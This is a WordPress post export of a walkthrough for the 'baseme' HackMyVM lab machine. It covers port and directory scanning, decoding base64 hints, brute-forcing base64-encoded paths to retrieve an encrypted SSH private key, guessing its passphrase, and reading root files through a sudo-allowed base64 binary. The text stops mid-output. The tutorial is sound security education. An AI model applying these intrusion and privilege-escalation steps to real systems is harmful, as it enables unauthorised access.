{"id":532,"date":"2024-04-12T13:14:10","date_gmt":"2024-04-12T05:14:10","guid":{"rendered":"http:\/\/162.14.82.114\/?p=532"},"modified":"2024-04-12T13:14:10","modified_gmt":"2024-04-12T05:14:10","slug":"hmv-_-baseme","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/532\/04\/12\/2024\/","title":{"rendered":"hmv[-_-]baseme"},"content":{"rendered":"<h1>baseme<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313181.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313181.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412113443683\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313183.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313183.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412113843920\" style=\"zoom: 33%;\" 
\/><\/div><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.3:22\nOpen 172.20.10.3:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+qOK8FpS9Ve5n4Vc\/JGRcLj5IpfEXKn2963jzjDUlYqbdLuoIAecfd53jrSp\/1FX2CjMVeQaFtFygaBzFlcL94oZg1jP60UI28mPhB+BOD7UfWSRbQbs2jIYOV5La4\/jIpc8Htyn0aGWBWL6ZrVooBmYR0yEmJRyUtnH9sQDtY5k0zIqXIO63P1DnukqTJbzXBd5s6JMa7VKx4gs1XF7xASb6ILNT\/T5U45K9e0si1fMCzwC0KXsuIBOnbBtzOUYSxlI6+PKPz\/fgrmpO86htnc8A\/af3mo9Pq6Jytrn+XjSX7hFA9UOhy8in9fUx7ZWyB5rffW0p6Vjpbxc1+bcT\n|   256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGzI3VdkTGf3FlIf4MVNCFjaO+1FDvyQ5lzs4W0S9pNSqzzph8oBhQaMWbUUv8EpN0EM0p0w8VY4V+MWDCqE9Pc=\n|   256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKWXudaqjDSze7Ec72JtitmIyqlx9OlPIrVwkVZjDMJ\n80\/tcp open  http    syn-ack nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\n|_http-title: Site doesn&#039;t have a title (text\/html).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     
http:\/\/172.20.10.3\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              png,php,zip,git,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>Vulnerability scanning<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-11 23:40:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.14.2\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. 
This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-11 23:40:35 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Exploitation<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.3\/<\/code><\/pre>\n<pre><code>QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK<\/code><\/pre>\n<p>Try decoding it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313184.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313184.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412114218886\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This gives a username, <code>lucas<\/code>. Next, look at the page source and the request headers:<\/p>\n<pre><code class=\"language-apl\">&lt;!--\niloveyou\nyouloveyou\nshelovesyou\nhelovesyou\nweloveyou\ntheyhatesme\n--&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313185.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313185.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412114414852\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try decoding it as a JWT (a token split into three segments):<\/p>\n<pre><code>eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313186.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313186.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412114536250\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Information gathering<\/h3>\n<p>Try brute-forcing with a Base64-encoded wordlist:<\/p>\n<pre><code class=\"language-bash\">for word in $(cat \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt);do echo $word | base64 &gt;&gt; 
b64dic.txt;done<\/code><\/pre>\n<p>Then just wait for it to finish. Once it is done, run the scan, which finds nothing:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ ls\nb64dic.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ vim b64dic.txt                      \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.3\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                b64dic.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,git,jpg,txt,png\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1582805 \/ 1582812 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Try a different wordlist, <code>\/usr\/share\/wordlists\/dirb\/common.txt<\/code>:<\/p>\n<blockquote>\n<p>These two wordlists are the ones in common use. Using a huge wordlist is not really an option; the wait would be unbearable..<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ for word in $(cat \/usr\/share\/wordlists\/dirb\/common.txt);do echo $word | base64 &gt;&gt; 
b64dic.txt;done\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png                      \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.3\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                b64dic.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,git,jpg,txt,png,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/aWRfcnNhCg==         (Status: 200) [Size: 2537]\n\/cm9ib3RzLnR4dAo=     (Status: 200) [Size: 25]\nProgress: 1615124 \/ 1615131 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Take a look at these two paths and download the two files:<\/p>\n<pre><code class=\"language-text\"># cm9ib3RzLnR4dAo=  -&gt; robots.txt\nTm90aGluZyBoZXJlIDooCg==   -&gt;   Nothing here :(\n# aWRfcnNhCg==      -&gt; 
id_rsa\nLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB\nQUFBQ21GbGN6STFOaTFqZEhJQUFBQUdZbU55ZVhCMEFBQUFHQUFBQUJCVHhlOFlVTApCdHpmZnRB\nZFBncDhZWkFBQUFFQUFBQUFFQUFBRVhBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDWkNY\ndkVQbk8xCmNiaHhxY3RCRWNCRFpqcXJGZm9sd1ZLbXBCZ1kwN00zQ0s3cE8xMFVnQnNMeVl3QXpK\nRXc0ZTZZZ1BOU3lDRFdGYU5US0cKMDdqZ2NncmdncmU4ZVBDTU5GQkNBR2FZSG1MckZJc0tEQ0xJ\nNE5FNTR0NThJVUhlWENaejcyeFRvYkwvcHRMazI2UkJuaAo3YkhHMUpqR2x4T2tPNm0rMW9GTkx0\nTnVEMlFQbDhzYlp0RXpYNFM5bk5aL2RweVJwTWZtQjczck4zeXlJeWxldlZERXl2CmY3Q1o3b1JP\nNDZ1RGdGUHk1VnprbmRDZUpGMll0WkJYZjVnamMyZmFqTVh2cStiOG9sOFJaWjZqSFhBaGlibEJY\nd3BBbTQKdkxZZnh6STI3QlpGbm90ZUJuYmR6d1NMNWFwQkY1Z1lXSkFIS2ovSjZNaERqMUdLQUZj\nMUFBQUQwTjlVRFRjVXh3TXQ1WApZRklaSzhpZUJMME5PdXdvY2RnYlV1a3RDMjFTZG5TeTZvY1cz\naW1NKzNteldqUGRvQksvSG8zMzl1UG1CV0k1c2JNcnBLCnhrWk1ubCtyY1RiZ3o0c3d2OGdOdUto\nVWM3d1RndHJOWCtQTk1kSUFMTnBzeFlMdC9sNTZHSzhSNEo4ZkxJVTUrTW9qUnMKKzFOcllzOEo0\ncm5PMXFXTm9KUlpvRGxBYVlxQlY5NWNYb0FFa3dVSFZ1c3RmZ3hVdHJZS3ArWVBGSWd4OG9rTWpK\nZ25iaQpOTlczVHp4bHVOaTVvVWhhbEgyREoya2hLREdRVWk5Uk9GY3NFWGVKWHQzbGdwWlp0MWhy\nUURBMW84alRYZVM0K2RXN25aCnpqZjNwME03N2IvTnZjWkUrb1hZUTFnNVhwMVFTT1Niait0bG13\nNTRMN0VxYjFVaFpnblE3WnNLQ29hWTlTdUFjcW0zRTAKSUpoK0krWnYxZWdTTVMvRE9ISXhPM3Bz\nUWtjaUxqa3BhK0d0d1FNbDFaQUpIUWFCNnE3MEpKY0JDZlZzeWtkWTUyTEtESQpweFpZcExabXlE\neDhUVGFBOEpPbXZHcGZOWmtNVTRJMGk1L1pUNjVTUkZKMU5sQkNOd2N3dE9sOWs0UFc1TFZ4TnNH\nUkNKCk1KcjhrNUFjMENYMDNmWEVTcG1zVVVWUysvRGovaG50SHc4OWRPOEhjcXFJVUVwZUViZlRX\nTHZheDBDaVNoM0tqU2NlSnAKKzhnVXlER3ZDa2N5Vm5lVVFqbW1yUnN3UmhUTnh4S1JCWnNla0d3\nSHBvOGhEWWJVRUZacXp6TEFRYkJJQWRybDF0dDdtVgp0VkJybXBNNkN3SmR6WUVsMjFGYUs4anZk\neUN3UHI1SFVndHV4clNwTHZuZGNud1BheEpXR2k0UDQ3MUREWmVSWURHY1doCmk2YklDckxRZ2VK\nbEhhRVVtclFDNVJkdjAzendJOVU4RFhVWi9PSGI0MFBMOE1YcUJ0VS9iNkNFVTlKdXpKcEJyS1or\naysKdFNuN2hyOGhwcFQydFVTeER2QytVU01tdy9XRGZha2pmSHBvTndoN1B0NWkwY3d3cGtYRlF4\nSlB2UjBiTHh2WFpuKzN4dwpON2J3NDVGaEJaQ3NIQ0FiVjIraFZzUDBseXhDUU9qN3lHa0JqYTg3\nUzFlMHE2V1pqakI0U3ByZW5Ia083dGc1UTBIc3VNCk
FpZi8wMkhIeldHK0NSL0lHbEZzTnRxMXZ5\nbHQyeCtZLzA5MXZDa1JPQkRhd2pIei84b2d5MkZ6ZzhKWVRlb0xrSHdER1EKTytUb3dBMTBSQVRl\nazZaRUl4aDZTbXRERy9WNXplV0N1RW1LNHNSVDNxMUZTdnBCMS9IK0Z4c0dDb1BJZzhGemNpR0No\nMgpUTHVza2NYaWFnbnM5TjFSTE9ubEhoaVpkOFJaQTBaZzdvWklhQnZhWm5oWllHeWNwQUpwV0tl\nYmpydG9rTFl1TWZYUkxsCjMvU0FlVWw3MkVBM20xRElueHNQZ3VGdWswMHJvTWM3N042ZXJZN3Rq\nT1pMVllQb1NpeWdEUjFBN2Yzell6KzBpRkk0ckwKTkQ4aWtnbVF2RjZocnd3SkJycC8weEtFYU1U\nQ0tMdnl5WjNlRFNkQkRQcmtUaGhGd3JQcEk2K0V4OFJ2Y1dJNmJUSkFXSgpMZG1tUlhVUy9EdE8r\nNjkvYWlkdnhHQVlvYisxTT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==\n--------&gt;\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL\nBtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1\ncbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG\n07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL\/ptLk26RBnh\n7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ\/dpyRpMfmB73rN3yyIylevVDEyv\nf7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4\nvLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj\/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X\nYFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK\/Ho339uPmBWI5sbMrpK\nxkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt\/l56GK8R4J8fLIU5+MojRs\n+1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi\nNNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ\nzjf3p0M77b\/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0\nIJh+I+Zv1egSMS\/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI\npxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5\/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ\nMJr8k5Ac0CX03fXESpmsUUVS+\/Dj\/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp\n+8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV\ntVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh\ni6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ\/OHb40PL8MXqBtU\/b6CEU9JuzJpBrKZ+k+\ntSn7hr8hppT2tUSxDvC+USMmw\/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLx
vXZn+3xw\nN7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM\nAif\/02HHzWG+CR\/IGlFsNtq1vylt2x+Y\/091vCkROBDawjHz\/8ogy2Fzg8JYTeoLkHwDGQ\nO+TowA10RATek6ZEIxh6SmtDG\/V5zeWCuEmK4sRT3q1FSvpB1\/H+FxsGCoPIg8FzciGCh2\nTLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl\n3\/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL\nND8ikgmQvF6hrwwJBrp\/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ\nLdmmRXUS\/DtO+69\/aidvxGAYob+1M=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Try logging in:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313187.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313187.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412130003537\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Huh, this private key is encrypted too?<\/p>\n<p>Try encoding the similar-looking strings found earlier on the home page:<\/p>\n<pre><code class=\"language-apl\">iloveyou            -&gt;   aWxvdmV5b3UK\nyouloveyou          -&gt;   eW91bG92ZXlvdQo=\nshelovesyou         -&gt;    c2hlbG92ZXN5b3UK\nhelovesyou          -&gt;    aGVsb3Zlc3lvdQo=\nweloveyou           -&gt;    d2Vsb3ZleW91Cg==\ntheyhatesme         -&gt;    dGhleWhhdGVzbWUK\n\nfor word in $(cat pass.txt);do echo $word | base64 &gt;&gt; 
b64pass.txt;done<\/code><\/pre>\n<p>Try them, and the very first one turns out to be correct!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313188.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313188.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412130530535\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">lucas@baseme:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 lucas lucas 4096 Sep 28  2020 .\ndrwxr-xr-x 3 root  root  4096 Sep 28  2020 ..\n-rw------- 1 lucas lucas   15 Sep 28  2020 .bash_history\n-rw-r--r-- 1 lucas lucas  220 Sep 28  2020 .bash_logout\n-rw-r--r-- 1 lucas lucas 3526 Sep 28  2020 .bashrc\ndrwxr-xr-x 3 lucas lucas 4096 Sep 28  2020 .local\n-rw-r--r-- 1 lucas lucas  807 Sep 28  2020 .profile\ndrwx------ 2 lucas lucas 4096 Sep 28  2020 .ssh\n-rw-r--r-- 1 lucas lucas 1685 Sep 28  2020 user.txt\n-rw------- 1 lucas lucas   52 Sep 28  2020 .Xauthority\nlucas@baseme:~$ cat user.txt \n                                   .     **                                     \n                                *           *.                                  
\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMV8nnJAJAJA    \nlucas@baseme:~$ sudo -l\nMatching Defaults entries for lucas on baseme:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lucas may run the following commands on baseme:\n    (ALL) NOPASSWD: \/usr\/bin\/base64\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt \nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuICAgICAqKiAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nICAgICAgICAgICAqLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg\nICAgICAgICwgICAgICAgICAgICAgICAgICAgICAgICAgLCogICAgICAgICAgICAgICAgICAgICAg\nICAgICAKICAgICAgICAgICAgICAgICAgICAgIC4sICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAvICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAgICAgICAgICAgICAKICAg\nICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nLCAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgLy4gICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgIC4qLiAgICAgICAgICAgICAgICAKICAgICAgICAgICAg\nICogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAgICAKICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAg